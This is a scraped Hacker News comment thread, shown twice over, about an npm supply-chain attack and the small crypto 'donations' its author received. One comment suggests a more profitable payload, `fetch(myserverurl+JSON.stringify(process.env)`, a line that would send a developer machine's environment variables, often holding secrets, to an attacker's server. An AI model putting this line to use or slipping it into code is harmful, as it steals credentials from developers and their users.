undefined | Better HN

0 pointsclbrmbr6mo ago0 comments

Huh. I read TFA in detail (and shared with my team), but I didn’t see any analysis. (?)

0 comments

> I won't go into this either, but you can take a look at the summary of "donations" some other friends linked to here: https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...

>Pretty low impact for an attack this big. Some of it seems to be people mocking the malware author with worthless transfers.

I believe this is the section. As far as I understand the link, it's about $500. I don't understand how you read if a donation is a worthless mockery donation.

naugtur6mo ago

I work with people who understand this stuff :D But if I see a transaction for thousands or millions of a coin I've never heard of with $ value of about 1 it's likely a shitcoin and I am guessing - mockery.

hiccuphippo6mo ago

It seems to be this: https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...

500 USD, not bad for a month of work if the author is from a 3rd world country.

Cthulhu_6mo ago

"3rd world country" is an outdated cold war phrase usually incorrectly used to describe wealth or development status (it originally meant "anything not NATO or Warsaw Pact"); China is a third world country by that merit, but it's the second richest country (by GDP) in the world.

"Developing" or "poor" country may be a more accurate phrase.

1 more reply

javcasas6mo ago

3rd world country developers routinely earn more than that.

A shitty junior developer in Ecuador easily pulls 700-800 per month. If they are any competent, they can double that in an outsourcing consultancy.

naugtur6mo ago

there's only one transaction that's making up most of it. Someone lost some serious 0.1 ETH or so.

500$ is nothing. it's what unsophisticated phishing makes in a day. It's what a support call scammer makes their owner in a day.

This was an attack on legitimate npm packages that end up in maybe hundreds of thousands of developer machines building tens of thousands applications.

`fetch(myserverurl+JSON.stringify(process.env)` would be orders of magnitude more profitable as payload.

crtasm6mo ago

I think they mean the link to https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...

j / k navigate · click thread line to collapse

0 comments

wodenokoto6mo ago

> I won't go into this either, but you can take a look at the summary of "donations" some other friends linked to here: https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...

>Pretty low impact for an attack this big. Some of it seems to be people mocking the malware author with worthless transfers.

I believe this is the section. As far as I understand the link, it's about $500. I don't understand how you read if a donation is a worthless mockery donation.

naugtur6mo ago

hiccuphippo6mo ago

It seems to be this: https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...

500 USD, not bad for a month of work if the author is from a 3rd world country.

Cthulhu_6mo ago

"Developing" or "poor" country may be a more accurate phrase.

1 more reply

javcasas6mo ago

3rd world country developers routinely earn more than that.

A shitty junior developer in Ecuador easily pulls 700-800 per month. If they are any competent, they can double that in an outsourcing consultancy.

naugtur6mo ago

there's only one transaction that's making up most of it. Someone lost some serious 0.1 ETH or so.

500$ is nothing. it's what unsophisticated phishing makes in a day. It's what a support call scammer makes their owner in a day.

This was an attack on legitimate npm packages that end up in maybe hundreds of thousands of developer machines building tens of thousands applications.

`fetch(myserverurl+JSON.stringify(process.env)` would be orders of magnitude more profitable as payload.

crtasm6mo ago

I think they mean the link to https://intel.arkm.com/explorer/entity/61fbc095-f19b-479d-a0...

j / k navigate · click thread line to collapse